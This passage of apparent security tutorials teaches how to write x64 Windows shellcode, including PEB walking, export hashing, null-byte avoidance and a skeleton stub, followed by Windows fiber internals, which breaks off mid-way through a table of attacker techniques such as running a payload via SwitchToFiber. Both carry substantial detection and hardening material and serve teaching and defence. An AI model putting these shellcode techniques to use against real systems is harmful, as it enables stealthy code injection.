  • Stack-string construction, XOR-zero idioms, and RIP-relative addressing keep the byte stream null-free and relocation-free.
  • Defenders catch the resulting behaviour through Sysmon EID 8/10, THREATINT ETW on VirtualAllocEx/WriteProcessMemory, and Volatility malfind/ldrmodules against unbacked RWX regions — and harden processes with ACG, CFG, HVCI, and ASR rules to break the primitive entirely.

Related Tutorials

References

Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions

Objective: Understand the architectural and ABI-level differences between x86 and x64 Windows shellcode, including the Microsoft x64 calling convention, shadow space, stack alignment, position-independent API resolution via PEB walking, and the detection surface each technique exposes.


1. From x86 to x64: What Actually Changed

Moving shellcode from x86 to x64 Windows is not a syntactic exercise of renaming EAX to RAX. The ABI changed, the segment register that anchors the TEB changed, and the addressing model changed. A snippet that “looks right” can execute cleanly, corrupt the host process, and crash three calls later inside an SSE instruction — none of which gives the author an obvious clue.

Itemx86x64
General-purpose registers8 × 32-bit (EAXEDI)16 × 64-bit (RAXR15)
Windows calling conventionstdcall / cdecl — all args on stackUnified fast-call — first 4 integer args in registers
TEB segment registerFS; PEB at fs:[0x30]GS; PEB at gs:[0x60]
Address width32-bit64-bit (48-bit canonical VA in practice)
call pushes4-byte return address8-byte return address
RIP-relative addressingNot availableAvailable; lea rax, [rip + offset] is idiomatic in PIC

Two consequences dominate the rest of this tutorial. First, x64 adopts a single __fastcall-style ABI with a mandatory shadow space and 16-byte stack alignment rule. Second, the TEB is reached via GS, not FS, and every PEB offset must be updated for the 64-bit struct layout.


2. The Microsoft x64 ABI Deep-Dive

The Microsoft x64 calling convention passes the first four integer arguments in registers and floating-point arguments in the low halves of the first four XMM registers. Anything beyond that goes on the stack, above the shadow space, pushed right-to-left.

Argument #Integer RegisterFloating-Point Register
1stRCXXMM0L
2ndRDXXMM1L
3rdR8XMM2L
4thR9XMM3L
5th+Stack (above shadow space)Stack

The return value lives in RAX for integers and pointers, and in XMM0 for floating-point results.

Volatile vs Non-Volatile Registers

ClassRegisters
VolatileRAX, RCX, RDX, R8, R9, R10, R11, XMM0XMM5
Non-volatileRBX, RBP, RDI, RSI, RSP, R12, R13, R14, R15, XMM6XMM15

A callee may freely destroy volatile registers; non-volatile registers must be preserved across calls. Shellcode that clobbers RBX or RDI in the host thread and then returns control corrupts the host. This is the single most common reason “working” shellcode crashes the host process several instructions after the shellcode finishes.

Side-by-Side: x86 Push vs x64 Register Load

; --- x86 stdcall: MessageBoxA(0, "msg", "title", 0) ---
push 0              ; uType
push title          ; lpCaption
push msg            ; lpText
push 0              ; hWnd
call [MessageBoxA]  ; callee cleans the stack

; --- x64 fastcall: same call ---
xor  rcx, rcx                       ; hWnd      = NULL
lea  rdx, [rel msg]                 ; lpText
lea  r8,  [rel title]               ; lpCaption
xor  r9d, r9d                       ; uType     = 0
sub  rsp, 0x28                      ; shadow space + alignment (see §4)
call [rel MessageBoxA]
add  rsp, 0x28

Note xor r9d, r9d rather than xor r9, r9 — writing to the 32-bit sub-register zero-extends to the full 64-bit register and produces a shorter, null-byte-free opcode.


Diagram showing the Microsoft x64 calling convention: arguments flow through RCX, RDX, R8, R9, then onto the stack, with the return value in RAX.
The Microsoft x64 ABI passes the first four integer arguments in registers; additional arguments land on the stack above shadow space.

3. Shadow Space: Why, What, and Where

In the Microsoft x64 convention the caller must reserve 32 bytes (4 × 8) of stack immediately above the return address as shadow space (also called home space or spill space). This area exists so the callee has somewhere to spill RCX, RDX, R8, and R9 back to memory if it needs to take their addresses or free up the registers for re-use.

Critical points:

  • Shadow space is always reserved, even when the callee takes fewer than four arguments and even when the callee never spills.
  • It is owned by the caller. The callee may overwrite it without saving the previous contents.
  • The caller does not zero or initialise it. The callee is responsible for whatever it writes there.
  • Stack arguments beyond the fourth begin at [RSP + 0x28] (32 bytes shadow + 8 bytes return address).
Layout immediately after call, before callee prologueOffset from RSP
Return address (pushed by call)[RSP + 0x00]
Shadow slot for RCX[RSP + 0x08]
Shadow slot for RDX[RSP + 0x10]
Shadow slot for R8[RSP + 0x18]
Shadow slot for R9[RSP + 0x20]
5th argument (if any)[RSP + 0x28]

Skip the shadow allocation and the first thing the callee does — often a mov [rsp+8], rcx early in a Win32 prologue — clobbers your own stack frame or, worse, the saved return address you just pushed.


Stack layout diagram showing the mandatory 32-byte shadow space between the return address and stack arguments in the Microsoft x64 calling convention.
The caller must always reserve 32 bytes of shadow space directly above the return address, with additional stack arguments starting at RSP+0x28.

4. Stack Alignment in Practice

The Microsoft x64 ABI requires RSP to be 16-byte aligned at the moment of a call, except inside a prolog. The hardware call then pushes an 8-byte return address, so on entry to the callee RSP is 16N + 8 aligned. Win32 internals (memcpy, CRT, anything that uses SSE/AVX with aligned moves) will issue movaps / movdqa against stack locations and will raise EXCEPTION_ACCESS_VIOLATION (0xC0000005) if RSP is wrong by 8.

This is why the canonical shellcode prologue is sub rsp, 0x28, not 0x20:

  • 0x20 (32 bytes) for shadow space.
  • + 0x08 to undo the misalignment the preceding call introduced.
; Canonical shellcode call wrapper
sub rsp, 0x28          ; 32B shadow + 8B realign
call rax               ; rax = resolved API address
add rsp, 0x28

When the shellcode entry itself was reached by a jump from unknown context, force alignment explicitly:

; Defensive entry: align RSP regardless of caller state
and rsp, 0xFFFFFFFFFFFFFFF0   ; force 16-byte alignment
sub rsp, 0x28                  ; shadow + 8 to keep call-time alignment

To diagnose alignment faults in WinDbg, dump the faulting instruction (u .) and check whether it is a movaps / movdqa referencing [rsp+…]. If rsp & 0xF == 0x8 at the call, you forgot the + 0x08.


5. Position-Independent Code Fundamentals

Shellcode does not know where it will land. Hard-coded addresses are forbidden — ASLR randomises module bases per boot, and the shellcode itself is dropped at an allocator-chosen address. Two x64 idioms enable position independence:

  • RIP-relative addressing. lea rax, [rel label] resolves to lea rax, [rip + disp32] and produces correct results regardless of load address. This is the preferred way to reference embedded data in x64 shellcode.
  • call/pop delta trick. A call to the next instruction pushes its return address — the runtime location of the following label. The callee pops it into a register to obtain a base for subsequent offsets.
; Obtain the runtime address of `data` without RIP-relative encoding
    call get_rip
get_rip:
    pop rbx                  ; rbx = address of next instruction
    lea rsi, [rbx + data - get_rip]
    jmp continue
data:
    db "kernel32.dll", 0
continue:

In practice, prefer lea reg, [rel label] for clarity; reach for call/pop only when an encoder demands it (for example, to avoid certain bad bytes).


6. PEB Walking: Finding kernel32.dll Without Imports

Because shellcode has no import table, it must walk the loader’s in-memory bookkeeping to find kernel32.dll and then resolve GetProcAddress / LoadLibraryA from its exports. On x64 Windows the chain starts at GS and uses these offsets:

StepSourceFieldOffset (x64)
1GS segmentTEB
2TEBProcessEnvironmentBlock+0x060
3PEBLdrPEB_LDR_DATA+0x018
4PEB_LDR_DATAInMemoryOrderModuleList+0x020
5LDR_DATA_TABLE_ENTRY linkInMemoryOrderLinks.Flink+0x000
6LDR_DATA_TABLE_ENTRYDllBase (from InMemoryOrderLinks)+0x030

The InMemoryOrderModuleList on a normal process begins with the executable, then ntdll.dll, then kernel32.dll. Walking two Flinks from the head reaches the kernel32.dll entry. Production-grade shellcode hashes the BaseDllName string rather than trusting that order, both for resilience and because EDRs deliberately permute the head of the list as a tripwire (see §10).

; --- PEB walk skeleton: locate kernel32.dll base in rax ---
    xor   eax, eax
    mov   rbx, [gs:0x60]        ; TEB -> PEB
    mov   rbx, [rbx + 0x18]     ; PEB -> Ldr (PEB_LDR_DATA)
    mov   rbx, [rbx + 0x20]     ; -> InMemoryOrderModuleList.Flink
                                ;    (points into 1st LDR_DATA_TABLE_ENTRY's InMemoryOrderLinks)
    mov   rbx, [rbx]            ; advance: -> 2nd entry (ntdll)
    mov   rbx, [rbx]            ; advance: -> 3rd entry (kernel32)
    mov   rax, [rbx + 0x30]     ; DllBase relative to InMemoryOrderLinks (x64)
                                ; rax now holds kernel32.dll base address

To verify the offsets against the target OS build, drop into WinDbg on a live process and dump the structures directly:

0:000> dt nt!_TEB ProcessEnvironmentBlock
0:000> dt nt!_PEB Ldr
0:000> dt nt!_PEB_LDR_DATA InMemoryOrderModuleList
0:000> dt nt!_LDR_DATA_TABLE_ENTRY DllBase BaseDllName
0:000> !lmi kernel32

Flow diagram tracing the PEB walk from GS register through PEB_LDR_DATA and InMemoryOrderModuleList to locate kernel32.dll base address.
Shellcode reaches kernel32.dll by following two Flink pointers from the InMemoryOrderModuleList head anchored at GS:[0x60].

7. Parsing the Export Address Table

With kernel32.dll‘s base in hand, the shellcode walks the PE headers to the Export Directory and then iterates AddressOfNames, comparing each name against a precomputed hash. String literals like "GetProcAddress" are avoided to defeat trivial signatures and to remove embedded nulls.

Key offsets from a loaded module base:

FieldOffset
e_lfanew (RVA of PE header)DllBase + 0x3C
Optional HeaderPE_header + 0x18
Export Directory RVA (PE32+)OptHeader + 0x70
AddressOfFunctionsExportDir + 0x1C
AddressOfNamesExportDir + 0x20
AddressOfNameOrdinalsExportDir + 0x24
; --- EAT walk outline: resolve an export by ROR-13 name hash ---
; in : rax = module base, ebp = target hash (e.g. for "GetProcAddress")
; out: rax = exported function address (or 0)

    mov   ecx, [rax + 0x3C]      ; e_lfanew
    add   rcx, rax               ; rcx = PE header
    mov   edx, [rcx + 0x88]      ; Export Directory RVA (OptHdr + 0x70)
    add   rdx, rax               ; rdx = IMAGE_EXPORT_DIRECTORY
    mov   r8d,  [rdx + 0x18]     ; NumberOfNames
    mov   r9d,  [rdx + 0x20]     ; AddressOfNames RVA
    add   r9, rax
    xor   r10, r10               ; index

.next_name:
    mov   esi, [r9 + r10*4]      ; name RVA
    add   rsi, rax               ; rsi -> ASCII export name
    xor   edi, edi               ; hash accumulator

.hash_byte:
    movzx eax, byte [rsi]
    test  al, al
    jz    .check
    ror   edi, 13
    add   edi, eax
    inc   rsi
    jmp   .hash_byte

.check:
    cmp   edi, ebp               ; compare ROR-13 hash
    je    .found
    inc   r10
    cmp   r10d, r8d
    jb    .next_name
    xor   rax, rax               ; not found
    ret
.found:
    ; resolve via AddressOfNameOrdinals + AddressOfFunctions
    ; (omitted for brevity)
    ret

The ROR-13 rotate-and-add hash, popularised by the Metasploit block_api stub, is the de facto standard precisely because defenders now key on it (see §10).


8. Null-Byte and Bad-Character Avoidance

Shellcode delivered through a string-copy primitive (strcpy, lstrcatA, format-string echo) is truncated at the first null byte. x64 immediates routinely embed nulls because most useful constants and addresses do not occupy all 64 bits.

ProblemFix
mov rax, 0x000000007FFE1234 → nullsxor eax, eax then mov eax, 0x7FFE1234 (zero-extends)
64-bit literal in mov r9, imm64lea r9, [rel label] or build via shifts/ORs
push 0 → encodes 6A 00xor rcx, rcx ; push rcx
mov rcx, 0 → 7-byte null runxor ecx, ecx
; --- Null-byte comparison ---
; BAD: mov rax, 0x76ab1234
;   48 B8 34 12 AB 76 00 00 00 00   <-- four null bytes
mov rax, 0x76ab1234

; GOOD: zero-extend via 32-bit sub-register
;   31 C0                            <-- xor eax, eax
;   B8 34 12 AB 76                   <-- mov eax, 0x76AB1234
xor eax, eax
mov eax, 0x76ab1234

Writing to EAX implicitly zeroes the upper 32 bits of RAX — this single architectural quirk eliminates most accidental nulls in shellcode constants.

A short Python lab to validate a candidate snippet:

from keystone import Ks, KS_ARCH_X86, KS_MODE_64

asm = b"""
    xor eax, eax
    mov eax, 0x76ab1234
    mov rbx, qword ptr gs:[0x60]
    mov rbx, qword ptr [rbx + 0x18]
"""
ks = Ks(KS_ARCH_X86, KS_MODE_64)
code, _ = ks.asm(asm)
buf = bytes(code)
print(buf.hex())
bad = [i for i, b in enumerate(buf) if b == 0x00]
print(f"length={len(buf)} bad_byte_offsets={bad}")

Run it, see exactly where nulls (or any other bad character) land, and rewrite the offending instruction.


9. Shellcode Skeleton: Putting It Together

The pieces combine into a recognisable x64 stub: align the stack, walk the PEB to find kernel32.dll, parse the EAT to resolve GetProcAddress and LoadLibraryA, and then call out through the standard ABI with proper shadow space.

[BITS 64]
_start:
    ; --- entry: defensively align stack ---
    and   rsp, 0xFFFFFFFFFFFFFFF0
    sub   rsp, 0x28                ; shadow space + alignment

    ; --- locate kernel32.dll via PEB ---
    mov   rbx, [gs:0x60]           ; TEB -> PEB
    mov   rbx, [rbx + 0x18]        ; PEB -> Ldr
    mov   rbx, [rbx + 0x20]        ; InMemoryOrderModuleList.Flink
    mov   rbx, [rbx]               ; -> ntdll entry
    mov   rbx, [rbx]               ; -> kernel32 entry
    mov   r15, [rbx + 0x30]        ; r15 = kernel32 base

    ; --- resolve GetProcAddress via ROR-13 hash (call into eat_lookup) ---
    mov   rcx, r15
    mov   edx, 0x7C0DFCAA          ; ROR-13("GetProcAddress")  (illustrative)
    call  eat_lookup               ; rax = &GetProcAddress
    mov   r14, rax

    ; --- call LoadLibraryA("user32.dll") via GetProcAddress ---
    mov   rcx, r15                 ; hModule = kernel32
    lea   rdx, [rel s_LoadLibraryA]
    call  r14                      ; rax = &LoadLibraryA
    lea   rcx, [rel s_user32]
    call  rax                      ; rax = HMODULE user32

    ; --- ... continue resolution and API calls ...

    add   rsp, 0x28
    ret

s_LoadLibraryA: db "LoadLibraryA", 0
s_user32:       db "user32.dll", 0

; eat_lookup: in rcx=module base, edx=ROR13 hash -> rax = export addr
eat_lookup:
    ; (see §7 for the inner loop)
    ret

Every block in the skeleton corresponds to one of the rules established above: sub rsp, 0x28 for shadow + alignment, gs:[0x60] for the PEB, [rbx + 0x30] for DllBase, lea + RIP-relative strings for PIC, and r14 / r15 carrying non-volatile state across calls without manual save/restore.


10. Common Attacker Techniques

TechniqueDescription
PEB-walk API resolutionLocate kernel32.dll via gs:[0x60] chain, parse exports by hash
ROR-13 export hashingAvoid embedded API name strings; survive static signature scans
RIP-relative PIClea reg, [rel label] to address embedded data without fixups
Sub-register zero-extensionmov eax, imm32 to write RAX with no null bytes
Shadow-space-aware call wrappingsub rsp, 0x28 around every Win32 call from an unknown caller
Direct Win32 → Native API substitutionCall Nt* syscalls to bypass usermode hooks (T1106)
Reflective loading of a PE in memoryShellcode bootstraps a full PE image without touching disk (T1620)

11. Defensive Strategies & Detection

Shellcode is observable at multiple layers. The most reliable signals come from the behaviours the techniques above require, not from the byte patterns they happen to produce.

Sysmon events to enable and triage:

  • EventID 1 — Process Create. Unusual parent/child chains (browser, Office, mail client spawning cmd.exe / powershell.exe) are the cheapest, highest-yield signal.
  • EventID 8CreateRemoteThread. Cross-process thread creation into LSASS, browsers, or signed Windows binaries is high-fidelity.
  • EventID 10ProcessAccess. Watch GrantedAccess masks like 0x1FFFFF (full access) and 0x1010 (read + VM-write).
  • EventID 17 / 18 — Pipe creation/connection, frequently used by shellcode-launched implants for C2.

ETW providers worth subscribing to in EDR pipelines:

  • Microsoft-Windows-Kernel-Process — kernel-side process/thread/image events.
  • Microsoft-Windows-Threat-Intelligence (PPL-only) — NtAllocateVirtualMemory, NtProtectVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx at the syscall layer, bypassed by no usermode hook.
  • Microsoft-Windows-Security-Auditing — handle and object access.

Audit policies: Audit Process Creation (Success) and Audit Kernel Object surface the same events to the classic Security log for SIEM ingestion.

Behavioural signals defenders should hunt on:

  • Threads with StartAddress in MEM_PRIVATE regions that are PAGE_EXECUTE_* and not backed by a file image.
  • CallTrace containing UNKNOWN frames — the calling instruction lives in unbacked memory.
  • gs:[0x60] opcode pattern (65 48 8B 04 25 60 00 00 00) inside executable regions of non-system modules.
  • ROR-13 hashing loops in memory scans.

Sigma sketch — suspicious cross-process access typical of shellcode injection:

title: Suspicious Cross-Process Access With VM-Write Rights
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x1FFFFF'
      - '0x1410'
      - '0x1010'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\WmiPrvSE.exe'
  condition: selection and not filter_legit
level: high

Hardening to deploy on monitored endpoints:

  • Arbitrary Code Guard (ACG) — denies the PAGE_EXECUTE_* transition that turns a MEM_PRIVATE shellcode buffer into runnable code.
  • Control Flow Guard (CFG) — invalidates indirect calls into unregistered targets, which shellcode entry points always are.
  • Block Win32 API calls from Office macros / child processes — Attack Surface Reduction rule that severs the most common shellcode delivery vector.
  • PPL-protected EDR with kernel ETW Ti subscription — preserves syscall-layer telemetry even when userland hooks are patched out.

A useful EDR tripwire is to permute the head of InMemoryOrderModuleList with stub entries: shellcode that walks two Flinks blindly resolves the decoy module, fails to find expected exports, and crashes — producing a high-fidelity detection.


12. Tools for x64 Shellcode Analysis

ToolDescriptionLink
NASMAssembler for the snippets in this tutorial; emits raw binary for direct hex inspectionnasm.us
Keystone EngineProgrammatic assembler (Python bindings) for bad-character analysis labskeystone-engine.org
x64dbgUser-mode debugger; trace shellcode through gs:[0x60] and EAT walksx64dbg.com
WinDbgInspect _TEB, _PEB, _PEB_LDR_DATA, _LDR_DATA_TABLE_ENTRY on the target buildlearn.microsoft.com
Ghidra / IDAStatic analysis of shellcode-bearing samples and reflective loader stubsghidra-sre.org
Volatility 3Memory forensics: enumerate suspicious MEM_PRIVATE + RX regions, hunt unbacked threadsvolatilityfoundation.org
Process HackerLive triage of thread start addresses and memory protectionsprocesshacker.sourceforge.io
Godbolt Compiler ExplorerInspect MSVC-emitted x64 prologues to confirm ABI assumptionsgodbolt.org

13. MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Process Injection (umbrella)T1055Sysmon EventID 8 + EventID 10 with VM-write GrantedAccess
DLL InjectionT1055.001Image Load (EventID 7) from MEM_PRIVATE-allocated path
Portable Executable InjectionT1055.002Volatility scans for PE headers in MEM_PRIVATE RX regions
APC InjectionT1055.004ETW Ti NtQueueApcThread to remote thread; alerted thread-start addresses
Process HollowingT1055.012EventID 1 with suspended child, followed by EventID 10 write + resume
Native APIT1106ETW Ti syscall provider; direct Nt* calls outside ntdll
Obfuscated Files or InformationT1027YARA on ROR-13 loops; entropy heuristics on dropped payloads
Reflective Code LoadingT1620Unbacked RX memory with PE magic / no module image record

Summary

  • x64 Windows shellcode is governed by a strict ABI: argument registers RCX/RDX/R8/R9, return in RAX, a 32-byte shadow space, and 16-byte stack alignment at every call.
  • The TEB is reached via gs:[0x60] on x64; every PEB offset (+0x18, +0x20, +0x30) differs from the x86 layout and must be verified against the target build.
  • Position-independent API resolution combines a PEB walk to kernel32.dll with an EAT walk using ROR-13 name hashing to avoid embedded strings.
  • Null-byte avoidance leans on 32-bit sub-register writes that zero-extend, RIP-relative lea, and XOR-then-push idioms.
  • Detection is layered: Sysmon EventID 8/10 for injection chains, ETW Threat-Intelligence for syscall-level memory writes, behavioural hunts for unbacked RX regions, and ACG/CFG/ASR hardening to deny the primitives shellcode depends on.

Related Tutorials

References

Fibers: User-Mode Cooperative Threads

Objective: Understand the internals of Windows fibers — how they relate to the TEB, the undocumented FIBER structure, Fiber Local Storage, and the cooperative context switch performed entirely in user mode — so defenders can recognize and detect adversarial use of fiber APIs for stealthy in-process execution.


1. Cooperative vs. Preemptive Scheduling

A thread is the Windows kernel’s unit of execution. The scheduler picks ready threads, slices CPU time, and preempts them at quantum boundaries — all driven from ntoskrnl.exe. A fiber is different: it is a unit of execution that the kernel does not know about. Fibers run inside threads, and the application — not the OS — chooses when one fiber yields and another runs.

Two consequences follow immediately:

  • A fiber switch never crosses the user/kernel boundary. No syscall is issued. SwitchToFiber lives in KernelBase.dll and returns without touching ntoskrnl.
  • From the kernel’s perspective, all activity performed by a fiber is attributed to the thread that runs it. Accessing TLS from a fiber accesses the thread’s TLS, not a per-fiber slot.

This is the root of both the elegance and the security relevance of fibers: they are coroutines built directly into the Win32 ABI, with stack pivots and register saves the kernel cannot see.


2. The Fiber Execution Model

A fiber consists of three things: a stack, a saved CPU context (registers, instruction pointer, SEH frame), and a start routine that receives an opaque parameter. A thread becomes “fiber-aware” by calling ConvertThreadToFiber, at which point that thread is permanently a fiber host until it calls ConvertFiberToThread.

RuleBehavior
Must convert firstYou cannot call SwitchToFiber from a thread until ConvertThreadToFiber runs.
Fiber function returningIf a fiber’s start routine returns, the host thread calls ExitThread and terminates.
Self-deleteIf the currently running fiber calls DeleteFiber on itself, the host thread exits.
Cross-thread deleteDeleting a fiber that is the selected fiber of another thread will likely crash that thread — its stack just disappeared.
Cross-thread switchSwitchToFiber accepts a fiber created by a different thread; the caller becomes the new host.

These rules are load-bearing — most fiber bugs (and several known abuse primitives) come from violating them.


3. TEB Layout and the FIBER Structure

The Thread Environment Block (TEB) tracks the per-thread fiber state. Three fields matter:

FieldTypeRole
NtTib.FiberDataPVOIDPointer to the current fiber’s FIBER structure
HasFiberDataUSHORT : 1Bitfield set by ConvertThreadToFiberEx; indicates the thread hosts fibers
FlsDataPVOIDPointer to the FLS slot array for the current fiber

ConvertThreadToFiberEx calls NtCurrentTeb(), checks Teb->HasFiberData, and if the thread is already a fiber returns with ERROR_ALREADY_FIBER. Otherwise it allocates a FIBER structure on the process heap via RtlAllocateHeap and stores its address in NtTib.FiberData.

The FIBER struct itself is not officially documented. The shape below is reconstructed from ReactOS sources and public symbols and is subject to change across Windows versions:

// Reconstructed from public symbols / ReactOS — illustrative only.
typedef struct _FIBER {
    PVOID    FiberData;          // lpParameter passed at creation
    PVOID    ExceptionList;      // Top of SEH chain (NT_TIB.ExceptionList)
    PVOID    StackBase;          // High end of the fiber stack
    PVOID    StackLimit;         // Low end (guard page)
    PVOID    DeallocationStack;  // Original VirtualAlloc base
    CONTEXT  FiberContext;       // Saved CPU state: RIP, RSP, RBP, RBX, ...
    ULONG    FiberFlags;         // FIBER_FLAG_FLOAT_SWITCH, etc.
    PVOID    ActivationContext;  // Per-fiber activation context stack
    PVOID    FlsSlots;           // Per-fiber FLS slot array
} FIBER, *PFIBER;

You must never read or write this structure directly. The Win32 fiber functions manage its contents; treating the returned LPVOID as opaque is part of the contract.


4. The Core Fiber API

The full surface is small. Most of winbase.h and fibersapi.h boils down to these functions:

FunctionPurpose
ConvertThreadToFiberPromote the calling thread into a fiber; required first
ConvertThreadToFiberExAs above; accepts FIBER_FLAG_FLOAT_SWITCH
CreateFiberAllocate stack + FIBER struct; record entry point and parameter
CreateFiberExAs above; accepts dwStackCommitSize and flags
SwitchToFiberCooperative context switch to the supplied fiber
DeleteFiberFree the fiber’s stack, context, and FIBER data
ConvertFiberToThreadDemote back to a plain thread; required to avoid leaks
GetCurrentFiberReturns the current FIBER address (intrinsic — no CALL)
GetFiberDataReturns the lpParameter value (intrinsic — no CALL)

The exact CreateFiber signature, per MSDN:

LPVOID CreateFiber(
    SIZE_T                dwStackSize,    // 0 = default, grows up to 1 MB
    LPFIBER_START_ROUTINE lpStartAddress, // void StartRoutine(LPVOID lpParameter)
    LPVOID                lpParameter     // passed to the fiber function
);

GetCurrentFiber and GetFiberData are compiler intrinsics on MSVC — they inline directly to a gs:[0x20]/fs:[0x10] read of NtTib.FiberData. They produce no import thunk and no CALL instruction, which has direct consequences for IAT-based detection.


5. Fiber Lifecycle: A Minimal Example

This walks the canonical create → switch → yield → delete sequence. Note how g_mainFiber is the fiber identity of the original thread, returned by ConvertThreadToFiber.

#include <windows.h>
#include <stdio.h>

LPVOID g_mainFiber  = NULL;
LPVOID g_workFiber  = NULL;

VOID CALLBACK WorkerFiberProc(LPVOID lpParam) {
    printf("[worker] running on fiber %p, param=%p\n",
           GetCurrentFiber(), lpParam);

    // Cooperative yield — control returns to the main fiber.
    SwitchToFiber(g_mainFiber);

    printf("[worker] resumed; returning will ExitThread()\n");
    SwitchToFiber(g_mainFiber);   // never let the routine return
}

int main(void) {
    // Promote thread; TEB->HasFiberData becomes 1.
    g_mainFiber = ConvertThreadToFiber(NULL);

    // 64 KiB stack; entry = WorkerFiberProc; param = 0xDEADBEEF.
    g_workFiber = CreateFiber(0x10000, WorkerFiberProc, (LPVOID)0xDEADBEEF);

    SwitchToFiber(g_workFiber);   // first run of worker
    printf("[main] back from worker\n");
    SwitchToFiber(g_workFiber);   // resume worker

    DeleteFiber(g_workFiber);     // safe: not the running fiber
    ConvertFiberToThread();       // demote; release fiber bookkeeping
    return 0;
}

Forgetting ConvertFiberToThread leaks the main fiber’s FIBER allocation on the process heap. Forgetting to yield back before the worker returns terminates the host thread via ExitThread.


6. Context Switching Internals

SwitchToFiber is the heart of the API. Conceptually, it performs:

  1. Save the current CPU state (RBX, RBP, RDI, RSI, R12R15, RSP, RIP on x64) into the current fiber’s FiberContext.
  2. Save the SEH chain head (NtTib.ExceptionList) and stack bounds (StackBase, StackLimit) into the current FIBER.
  3. If FIBER_FLAG_FLOAT_SWITCH is set, save the XMM/MMX/x87 state.
  4. Update NtTib.FiberData to point at the target FIBER.
  5. Restore the target fiber’s stack bounds, SEH chain, FLS pointer, and CPU registers.
  6. Return to the saved instruction pointer of the target — execution resumes there on the target’s stack.

Critically, this is a pure user-mode operation. No syscall, no int 2e, no ETW event from Microsoft-Windows-Kernel-Process. The host thread’s kernel-visible state (KTHREAD, ETHREAD) is unchanged; only RIP/RSP move from the kernel’s view.

; Conceptual sketch — SwitchToFiber x64 prologue
mov     gs:[0x20], rcx          ; NtTib.FiberData = target
mov     [rax + FiberContextOff + Rsp], rsp
mov     [rax + FiberContextOff + Rip], <return addr>
; ... restore target ...
mov     rsp, [rcx + FiberContextOff + Rsp]
jmp     qword [rcx + FiberContextOff + Rip]

Flow diagram showing the six steps of SwitchToFiber: saving registers, saving SEH and stack bounds, updating NtTib.FiberData, restoring target registers, and jumping to the target fiber's saved RIP — all in user mode with no syscall
SwitchToFiber completes an entire stack-and-register swap inside KernelBase.dll without issuing a single syscall or generating a kernel ETW event.

7. Fiber Local Storage (FLS)

TLS is per-thread. During a fiber switch the TEB’s TLS array is not swapped, so two fibers sharing a thread share TLS — a classic source of corruption when porting thread-based libraries to fibers. FLS solves this: it is per-fiber, and SwitchToFiber updates TEB->FlsData to the incoming fiber’s slot array.

FunctionPurpose
FlsAlloc(PFLS_CALLBACK_FUNCTION)Allocate an FLS index; optional destructor callback
FlsSetValue(DWORD, PVOID)Store a per-fiber value at the given index
FlsGetValue(DWORD)Read the current fiber’s value at the given index
FlsFree(DWORD)Release the index; callbacks fire for live fibers

The destructor callback pointers are kept process-wide in PEB->FlsCallback. They fire on fiber deletion and thread exit, and — as covered below — they are a known abuse target.

DWORD g_flsIndex;

VOID WINAPI OnFlsDestroy(PVOID p) {
    HeapFree(GetProcessHeap(), 0, p);
}

VOID CALLBACK FiberA(LPVOID _) {
    char *buf = (char*)HeapAlloc(GetProcessHeap(), 0, 32);
    lstrcpyA(buf, "fiber-A-private");
    FlsSetValue(g_flsIndex, buf);
    SwitchToFiber(g_mainFiber);
    printf("[A] still mine: %s\n", (char*)FlsGetValue(g_flsIndex));
    SwitchToFiber(g_mainFiber);
}

int wmain(void) {
    g_mainFiber = ConvertThreadToFiber(NULL);
    g_flsIndex  = FlsAlloc(OnFlsDestroy);
    // ... create FiberA, FiberB, switch between them ...
    // Each fiber sees its own FlsGetValue(g_flsIndex) result.
}

Hierarchy diagram showing how PEB holds FlsCallback destructor pointers, TEB holds NtTib.FiberData pointing to the FIBER structure and FlsData pointing to the per-fiber FLS slot array, with the destructor relationship between PEB FlsCallback and the slot array
FLS slot arrays are swapped per-fiber on every SwitchToFiber call, while PEB→FlsCallback holds process-wide destructor pointers that fire on fiber deletion — a known adversarial overwrite target.

8. Building a Round-Robin Cooperative Scheduler

Fibers shine when modeling cooperative pipelines: parsers, generators, state machines. A trivial scheduler is a dispatcher fiber that round-robins through worker fibers, each of which yields back via SwitchToFiber(g_mainFiber).

#define N 3
LPVOID g_workers[N];
LPVOID g_mainFiber;

VOID CALLBACK Worker(LPVOID id) {
    for (int i = 0; i < 4; ++i) {
        printf("[worker %llu] step %d\n", (ULONG_PTR)id, i);
        SwitchToFiber(g_mainFiber);   // yield
    }
    // Final yield — never return from a fiber routine.
    SwitchToFiber(g_mainFiber);
}

int main(void) {
    g_mainFiber = ConvertThreadToFiber(NULL);
    for (ULONG_PTR i = 0; i < N; ++i)
        g_workers[i] = CreateFiber(0, Worker, (LPVOID)i);

    for (int round = 0; round < 4; ++round)
        for (int i = 0; i < N; ++i)
            SwitchToFiber(g_workers[i]);

    for (int i = 0; i < N; ++i) DeleteFiber(g_workers[i]);
    ConvertFiberToThread();
    return 0;
}

This is the same pattern Microsoft SQL Server used for its historical “lightweight pooling” / fiber mode — one OS thread, many SQL user contexts.


9. Legitimate Use Cases and Pitfalls

Use CaseReason
Coroutines / generatorsNative stack switching with no setjmp tricks
Porting cooperative legacy codeUNIX swapcontext-style schedulers map cleanly
Database enginesSQL Server fiber mode for high-concurrency workloads
Game engines / scripting hostsPer-script execution context with explicit yield

Pitfalls are sharp:

  • COM is apartment-affinitive to threads, not fibers. Initializing COM on one fiber and using it from another corrupts COM bookkeeping.
  • CRT and many MS libraries stash state in TLS. Switching fibers leaves that state behind, producing subtle corruption.
  • Critical sections record the thread as the owner — a different fiber on the same thread re-enters without blocking.
  • Stack-cookies and __try/__except rely on SEH chain integrity; SwitchToFiber handles this, but raw RtlInstallFunctionTableCallback on a fiber stack must use the fiber’s StackBase/StackLimit.

10. Common Attacker Techniques

Fibers are attractive to adversaries because the entire execution primitive lives in user mode — no NtCreateThread, no CreateRemoteThread, no kernel ETW event for the act of switching execution. The patterns below are documented in public threat-research literature; described conceptually here for detection engineers.

TechniqueDescription
In-process shellcode via SwitchToFiberAllocate PAGE_EXECUTE_READWRITE memory, copy a payload, call ConvertThreadToFiber then CreateFiber with the payload as lpStartAddress, then SwitchToFiber — execution begins with no new thread
Fiber-based ROP stagingA fiber’s saved CONTEXT includes RIP and RSP; manipulating a FIBER struct’s context fields lets an attacker pivot the stack on SwitchToFiber
